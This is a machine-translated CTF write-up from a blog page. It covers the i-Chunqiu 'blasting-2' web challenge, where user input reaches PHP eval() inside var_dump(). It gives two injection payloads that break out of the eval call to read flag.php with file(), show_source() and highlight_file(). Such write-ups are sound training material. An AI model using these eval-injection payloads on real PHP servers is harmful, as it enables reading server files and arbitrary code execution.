当前位置:网站首页>I spring and autumn blasting-2
I spring and autumn blasting-2
2022-07-05 15:11:00 【Golden silk】
Open the connection , Another one PHP Code , Then audit it

eval(" Code a") Function is to make code a image PHP Do the same , Using this function, you can add code to this php In the document
Method 1 :
file() function , Is to read the file into the array ,PHP file() function | Novice tutorial (runoob.com)
Using this function , Can output flag.php Contents of Li , structure payload
url?hello=file("flag.php")

Get flag
Method 2 :
utilize ); Add a few more codes to this php in , You can use the following two functions , Output flag The file of
PHP show_source() function | Novice tutorial (runoob.com)
PHP highlight_file() function | Novice tutorial (runoob.com)
structure payload
url?hello=);show_source("flag.php");highlight_file("flag.php"

Mainly integration eval Things in functions
); To integrate the previous var_dump(
highlight_file("flag.php" To integrate the latter );
The principle is based on the original code , hold
eval( "var_dump($a);");
Instead of
var_dump();show_source("flag.php");highlight_file("flag.php");
In view of :i spring and autumn CTF Training Misc Web Blast -2_ Coconut milk jelly unsafe blog -CSDN Blog
边栏推荐
- 手写promise与async await
- 面试突击62:group by 有哪些注意事项?
- 超越PaLM!北大碩士提出DiVeRSe,全面刷新NLP推理排行榜
- 【jvm】运算指令
- 超越PaLM!北大硕士提出DiVeRSe,全面刷新NLP推理排行榜
- Bugku's steganography
- Ctfshow web entry explosion
- 【华为机试真题详解】字符统计及重排
- Visual task scheduling & drag and drop | scalph data integration based on Apache seatunnel
- [detailed explanation of Huawei machine test] happy weekend
猜你喜欢

百亿按摩仪蓝海,难出巨头

Interview shock 62: what are the precautions for group by?

Differences between IPv6 and IPv4 three departments including the office of network information technology promote IPv6 scale deployment

你童年的快乐,都是被它承包了
![[12 classic written questions of array and advanced pointer] these questions meet all your illusions about array and pointer, come on!](/img/d2/c0a19c85b2011ecd07c9944d996c4d.png)
[12 classic written questions of array and advanced pointer] these questions meet all your illusions about array and pointer, come on!

Coding devsecops helps financial enterprises run out of digital acceleration

1330:【例8.3】最少步数

Ctfshow web entry information collection

机器学习笔记 - 灰狼优化

qt creater断点调试程序详解
随机推荐
Interview shock 62: what are the precautions for group by?
Detailed explanation of usememo, memo, useref and other relevant hooks
数据库学习——数据库安全性
Jmeter性能测试:ServerAgent资源监控
Dark horse programmer - software testing -10 stage 2-linux and database -44-57 why learn database, description of database classification relational database, description of Navicat operation data, de
go学习 ------jwt的相关知识
Crud de MySQL
mapper.xml文件中的注释
P6183 [USACO10MAR] The Rock Game S
爱可可AI前沿推介(7.5)
Surpass palm! Peking University Master proposed diverse to comprehensively refresh the NLP reasoning ranking
Garbage collection mechanism of PHP (theoretical questions of PHP interview)
How can I quickly check whether there is an error after FreeSurfer runs Recon all—— Core command tail redirection
NBA赛事直播超清画质背后:阿里云视频云「窄带高清2.0」技术深度解读
【华为机试真题详解】字符统计及重排
裁员下的上海
Common redis data types and application scenarios
webRTC SDP mslabel lable
[detailed explanation of Huawei machine test] happy weekend
【華為機試真題詳解】歡樂的周末